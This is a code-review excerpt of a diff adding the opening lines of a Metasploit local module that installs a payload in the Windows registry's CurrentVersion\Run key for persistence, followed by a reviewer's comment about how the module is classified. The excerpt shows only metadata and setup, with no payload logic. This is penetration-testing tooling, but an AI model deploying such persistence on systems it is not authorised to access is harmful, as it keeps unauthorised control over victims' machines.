modules/exploits/windows/local/registry_persistence.rb

```diff
@@ -0,0 +1,192 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+require 'msf/core/post/file'
+
+    class Metasploit4 < Msf::Exploit::Local
+    Rank = ExcellentRanking
+
+    include Msf::Exploit::Powershell
+    include Msf::Post::Windows::Registry
+    include Msf::Post::File
+
+
+    def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Windows Registry Only Persistence',
+      'Description'    => %q{
+        This module will install a payload that is executed during boot.
+        It will be executed either at user logon or system startup via the registry
+        value in "CurrentVersion\Run" (depending on privilege and selected method).
+        The payload will be installed completely in registry.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Donny Maasland <donny.maasland[at]fox-it.com>',
+        ],
+      'Platform'       => [ 'win' ],
+      'SessionTypes'   => [ 'meterpreter' ],
+      'Targets'          =>
+        [
+          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => "Jul 1 2015",
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'true'
```

Comment:
This is a sign that it should probably be an auxiliary or post module rather than a local exploit.